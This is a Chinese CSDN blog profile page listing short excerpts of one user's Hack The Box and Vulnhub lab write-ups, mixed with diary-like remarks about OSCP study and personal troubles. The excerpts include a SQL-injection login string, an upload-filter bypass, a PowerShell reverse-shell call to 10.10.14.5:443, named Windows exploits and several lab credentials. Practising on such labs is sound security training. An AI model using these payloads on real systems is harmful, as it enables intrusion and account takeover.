3 菜浪马废

尚未进行身份认证

我要认证

等级
TA的排名 12w+

Vulnhub靶机 Tr0ll2

80什么也没找到ftp倒是登录成功了下载文件需要密码去看看之前看到的图片以为是密码结果是网页速度好快啊直接密码就出来了完了缓冲区溢出我不会啊我不会我不想做缓冲区溢出的题...

2020-06-09 16:30:27

Hack the box靶机 Conceal

连接上了重新用nmap扫描写不动了又开始心烦了

2020-06-04 14:53:49

Hack the box靶机 Bastion

还差四个靶机然后就准备去练oscp的lab了加油开了ssh还有smb先扫描smb发现Backups下面有一个note.txt下载下来查看系统管理员:请不要在本地传输整个备份文件,VPN到分公司的速度太慢。在mnt下创建Backups文件夹挂载可以直接访问smb的文件就是有点慢.VHD文件相当于硬盘挂载它访问.config文件发现账号和哈希值L4mpje:bureaulampjessh登录...

2020-06-04 13:12:31

Hack the box靶机 SecNotes

注册了一个admin‘ or ‘1’='1的用户登录发现一个账户看见bash.lnk可以查看root.txt也可以像下面这样完成好几天没学习了因为有点心烦特别爱的女孩突然就走了我知道错了也知道怎么改可是根本没有机会改了特别难受只能学习了因为我怕我闲下来了就疯狂的想她我真害怕我弄丢他还是丢了其实闲不闲下来还是一直在想真他妈的烦...

2020-06-03 21:21:26

Hack the box靶机 Bounty

两个页面都是没有权限不能访问但是也没有扫出来登录页面投个图他们换了本字典我懒得扫了有过滤上传了一个shell.php.gif绕过了找到一篇博客上传.config使用nishang的Invoke-PowerShellTcp.ps1的时候需要在这个文件末尾加入调用Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443然后就可以连接了没有补丁那ms15-051完成...

2020-06-03 18:51:20

Hack the box靶机 Soli

突破口是oracle就是真的慢我快吐了scott/tiger不知道为什么老是连接不上给我整不会了但是我重启了一下换了一个端口然后就好了

2020-06-03 17:13:53

Hack the box靶机 Arctic

找到后台登录地址coldfusion 8搜索漏洞找到可以上传的地方需要payload使用MS10-059https://github.com/Re4son/Chimichurri完成

2020-06-03 13:08:34

Hack the box靶机 Bastard

修改几处地方准备用nc连接

2020-06-03 11:26:28

Hack the box靶机 Chatterbox

修改地址把生成的字符串替换python里的

2020-06-02 14:33:24

Hack the box靶机 Gradnma

解决进程问题进程迁移

2020-05-28 15:28:12

Hack the box靶机 Grandpa

migrate进程迁移win的题怎么都是用msf做的呢看大佬们没有不用msf的

2020-05-28 14:41:37

Hack the box靶机 Optimum

拿到user.txtmsf关于win的提权还是要再看看要不不会今天先这样吧睡觉

2020-05-28 00:28:24

Hack the box靶机 Jerry

需要账户???????老子就点了个取消你把密码都给我了?tomcat:s3cret登录完还是这个再找找其他的/manage可以登录进来可以上传文件需要点一下我上传的shell才能连接查看有空格的文件名的时候用“”把文件名括起来就可以查看了白天不知道因为什么心烦没怎么学习随便翻了翻linux的缓冲区还有一个htb上win的简单的题还得努力啊离着月薪三万还差得远呢加油!...

2020-05-27 23:51:52

Hack the box靶机 Blue

开放445端口扫描ms17010漏洞可用msf登场简单我决定先把简单的win做了然后由简入深慢慢学习31号我觉得应该能把htb的win打完加油!

2020-05-27 23:20:51

Hack the box靶机 Devel

Web服务器[IIS支持.aspx .asp文件]做了两个windows的walkthrough都是教用msf提权的难道我msf一定要用到win上么?

2020-05-27 17:30:05

Hack the box靶机 Legacy

MS08067我还有本MS08067实验室写的书呢就用这个漏洞吧考试的时候可以直接试一下永恒之蓝cat user.txt时需要用“”包裹住路径serach -f 文件名查找文件路径

2020-05-27 15:25:02

Hack the box靶机 Frolic

admin:superduperlooperpassword_loladmin:imnothuman上面那一堆?!是Ook!语言…

2020-05-27 13:45:27

Hack the box靶机 Mango

网站不能访问所以在/etc/hosts里加入10.10.10.162 mango.htb绕过教程但是登录了没啥用也枚举脚本admin的密码不能登录但是mango的可以https://gtfobins.github.io/gtfobins/jjs/jjs可以利用

2020-05-26 19:31:23

Hack the box靶机 Postman

没啥能利用的啊看看6379端口脚本

2020-05-26 14:57:56

Hack the box靶机 Mirai

goole一下默认密码登录失败但是可以ssh开始说在usb设备里usb设备里有文件查看发现说被删除了让我们找回重点不在于提权了考核的就是一个找回文件写着写着突然不想睡了想再来一个靶机…...

2020-05-26 01:20:40

查看更多

勋章 我的勋章
  • 签到达人
    签到达人
    累计签到获取,不积跬步,无以至千里,继续坚持!
  • 新人勋章
    新人勋章
    用户发布第一条blink获赞超过3个即可获得
  • 阅读者勋章Lv1
    阅读者勋章Lv1
    授予在CSDN APP累计阅读博文达到3天的你,是你的坚持与努力,使你超越了昨天的自己。
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv4
    勤写标兵Lv4
    授予每个自然周发布9篇以上(包括9篇)原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。
  • 学习力
    学习力
    《原力计划【第二季】》第一期主题勋章 ,第一期活动已经结束啦,小伙伴们可以去参加第二期打卡挑战活动获取更多勋章哦。
  • 原力新人
    原力新人
    在《原力计划【第二季】》打卡挑战活动中,成功参与本活动并发布一篇原创文章的博主,即可获得此勋章。
  • 原力探索 · S
    原力探索 · S
    在《原力计划【第二季】》打卡挑战活动中,发布 12 篇原创文章参与活动的博主,即可获得此勋章。(本次活动结束后统一统计发放)
  • 分享学徒
    分享学徒
    成功上传1个资源即可获取